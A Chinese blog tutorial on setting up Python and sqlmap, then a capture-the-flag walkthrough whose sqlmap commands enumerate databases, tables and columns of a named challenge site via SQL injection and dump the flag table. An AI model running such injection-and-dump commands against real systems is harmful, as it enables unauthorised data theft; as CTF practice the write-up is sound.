sqlmap是用python写的所以运行前得配置python环境。

首先进入https://www.python.org/downloads/    下载python ,一直默认安装就好了,如果需要安装到其他的盘可以修改,环境变量配置的时候注意一下就好了,安装完成后,进入cmd界面,输入python,如果安装成功应该可以出现这个界面。

然后进入http://sqlmap.org/  下载sqlmap,将下载后得到的压缩包文件解压并拷贝到安装python的文件夹。

然后在桌面新建一个cmd快捷方式,在新建的cmd快捷方式中设置起始位置为sqlmap的py程序所在的文件夹

打开sqlmap 输入如下指令 (此处测试网址为三叶草技术小组第八届极客大挑战sql注入题,请切勿恶意攻击!)

sqlmap.py -u"http://game.sycsec.com:2006/?id=1&submit=submit" --random-agent --dbs

这里的 --random-agent 是随机UA,我的理解是模拟浏览器,否则有的网址会因为发现是sqlmap而拒绝被访问。输入上面语句爆出数据库

因为这里的目的是得到flag,所以针对性的访问f1ag数据库。输入如下语句

sqlmap.py -u"http://game.sycsec.com:2006/?id=1&submit=submit" --random-agent -D "f1ag" --tables

得到f1ag里面的表,

(图中的字体比较奇怪,我把埚甩给了系统字体,,,,其实是flag  而不是f1ag  所以在构建语句的时候可以复制粘贴数据库中爆出的信息,不然有时候自己会很迷。)

得到数据库中的表然后是字段,输入下面语句

sqlmap.py -u"http://game.sycsec.com:2006/?id=1&submit=submit" --random-agent -D "f1ag" -T "flag" --columns

得到字段后,爆出字段内容,构造如下语句

sqlmap.py -u"http://game.sycsec.com:2006/?id=1&submit=submit" --random-agent -D "f1ag" -T "flag" -C "f4ag" --dump

就得到了flag,

over

转载于:https://www.cnblogs.com/0xk1l0-305/p/7881890.html

关于sqlmap的配置和基本使用教程相关推荐

  1. Windows Android SDK下载安装,配置,异常问题解决教程

    Windows Android SDK下载安装,配置,异常问题解决教程 参考文章: (1)Windows Android SDK下载安装,配置,异常问题解决教程 (2)https://www.cnbl ...

  2. 安装python程序后要进行什么设置-安装好Pycharm后如何配置Python解释器简易教程...

    这两天有许多Python小白加入学习群,并且问了许多关于Pycharm基本使用的问题,今天小编就以配置Python解释器的问题给大家简单絮叨一下. 1.一般来说,当我们启动Pycharm,如果Pych ...

  3. win7配置计算机失败还原更改,win7配置失败如何处理?win7配置失败还原更改教程...

    win7配置失败如何处理?电脑开机之后,出现"配置windows失败,还原更新,请勿关机"提示,这是怎么回事呢?出现"配置失败还原更改"导致循环无法进入桌面,遇 ...

  4. mysql5.7.14操作命令_Mysql5.7.14安装配置方法操作图文教程(密码问题解决办法)

    本篇文章主要涉及mysql5.7.14用以往的安装方法安装存在的密码登录不上,密码失效等问题的解决办法,希望可以帮到有同样困扰的朋友. 具体过程如下: 一.软件下载: 2.将下载的文件进行减压,作者的 ...

  5. iBatis SqlMap的配置总结

    核心提示:SqlMap的配置是iBatis中应用的核心.这部分任务占据了iBatis开发的70的工作量. 1.命名空间: sqlMap namespace=Account,在此空间外要引用此空间的元素 ...

  6. Git安装及配置5分钟快速教程

    转载自 Git安装及配置5分钟快速教程 Git是什么 Git是一款免费.开源的分布式版本控制系统,可以有效.高速的处理从很小到非常大的项目版本管理. 与常用的版本控制工具CVS.Subversion等 ...

  7. VS2019配置opencv详细图文教程和测试代码

    摘要: vs2019新鲜出炉,配置opencv又有哪些不一样呢,这个教程将会一步一步的教你如何配置opencv和跑动opencv一个简单的项目. 测试代码请在原文找到,转发备注原文链接:https:/ ...

  8. phpcmsV9 邮箱配置(含图文教程) - 案例篇

    文章目录 phpcmsV9邮箱配置(含图文教程) - 案例篇 前言 · 步骤分析: 步骤 · 开始配置: 相关阅读: phpcmsV9邮箱配置(含图文教程) - 案例篇 前言 · 步骤分析: 注册管理 ...

  9. HbuilderX + 配置Git 代码托管 - 教程篇

    HbuilderX + 配置Git 代码托管 - 教程篇 配置详请 · 步骤: 文章教程:HbuilderX配置Git插件并导入项目和上传代码 具体不再赘述,仅作为资源链接,自助参考总结. 以上就是关 ...

  10. Mac OSX操作系统安装和配置Zend Server 6教程(1)

    作为web开发人员,应该熟悉掌握各种系统下安装和配置web服务器与站点的技术. 随着越来越多的开发人员选择Zend Server服务器,慧都推出了在Mac OSX系统安装和配置Zend Server ...

最新文章

  1. python安装旧版的opencv(3.1.0为例)
  2. 若依JAVA开源框架自动生成代码步骤记录-创建子module以及导入子module相关问题
  3. 【转载】使用tf.py_func函数增加Tensorflow程序的灵活性
  4. C++之yaml-cpp开源库的使用笔记
  5. 环保牵手大数据 佛企需反向挖掘数据价值
  6. 在linux里如何建立一个快捷方式,连接到另一个目录
  7. Log4net 配置详解
  8. 2011年Esri用户大会技术亮点总结之一:概览
  9. 域控激活计算机用户,Windows2008AD 域控安装(示例代码)
  10. RecycleView获取所有的ViewHolder
  11. ibm量子云计算机,IBM量子云的16个量子比特全被纠缠起来了!
  12. Arduino ESP32 看门狗定时器
  13. 基于C#(Visual Studio 2013)的AutoCAD2016二次开发(二)创建直线
  14. 一文看懂5种ESD防护方法!
  15. laravel框架图片无法显示问题
  16. appendChild()方法
  17. 猜拳游戏android代码,android 简易的猜拳小游戏
  18. Android 4.0 平台特性
  19. 二维图像中的Hessian矩阵(及MATLAB代码)
  20. ISO 16750.3-2012道路车辆电子电气部件的环境试验 第三部分

热门文章

  1. 用AlphaGo背后的人工智能做金融投资
  2. Activity调度机制
  3. 嵌入式系统开发快速体验
  4. pyQT指定窗口截图
  5. Machine Learning - XII. Support Vector Machines支持向量机(Week 7)
  6. java快排原理_快速排序 java实现 (原理-优化) 三路快排
  7. 力扣-451 根据字符出现频率排序
  8. 《Flutter 从0到1构建大前端应用》读后感—第6章【使用网络技术与异步编程】
  9. TCP三次握手四次挥手介绍
  10. microsoft azure